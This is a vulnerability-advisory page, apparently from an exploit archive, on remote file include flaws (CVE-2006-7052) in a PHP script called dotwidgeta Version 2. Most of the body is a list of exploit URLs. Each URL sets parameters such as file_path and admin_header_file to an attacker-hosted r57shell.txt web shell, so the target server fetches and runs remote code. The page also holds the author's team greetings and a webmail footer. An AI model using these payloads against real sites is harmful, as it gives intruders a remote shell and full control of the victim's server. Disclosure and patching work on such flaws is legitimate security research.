Bug: file include exploits in dotwidgeta Version 2 ( Ascii Version )

Search:
WLB2

file include exploits in dotwidgeta Version 2

Published
Credit
Risk
2007.03.02
sweet-devil
High
CWE
CVE
Local
Remote
N/A
CVE-2006-7052
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
10/10
10/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

Multiple file include exploits in dotwidgeta Version 2

script type : dotwidgeta Version 2
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploits :

index.php

http://www.example.com/path/index.php?file_path=http://yoursite/r57shell
.txt?

ecrire.php

http://www.example.com/path/showcatpicks.php?file_path=http://yoursite/r
57shell.txt?

showarticle.php

http://www.example.com/path/showarticle.php?file_path=http://yoursite/r5
7shell.txt?

authors.php

http://www.example.com/path/admin/authors.php?admin_header_file=http://y
oursite/r57shell.txt?

authors.php

http://www.example.com/path/admin/authors.php?admin_footer_file=http://y
oursite/r57shell.txt?

articles.php

http://www.example.com/path/admin/articles.php?admin_footer_file=http://
yoursite/r57shell.txt?

index.php

http://www.example.com/path/admin/index.php?admin_header_file=http://you
rsite/r57shell.txt?

categories.php

http://www.example.com/path/admin/categories.php?admin_header_file=http:
//yoursite/r57shell.txt?

categories.php

http://www.example.com/path/admin/categories.php?admin_footer_file=http:
//yoursite/r57shell.txt?

editconfig.php

http://www.example.com/path/admin/editconfig.php?admin_header_file=http:
//yoursite/r57shell.txt?

editconfig.php

http://www.example.com/path/admin/editconfig.phpadmin_footer_file=http:/
/yoursite/r57shell.txt?

####################################################

#######################
emails:

gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################

All my respect to our friends , lezr.com

done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version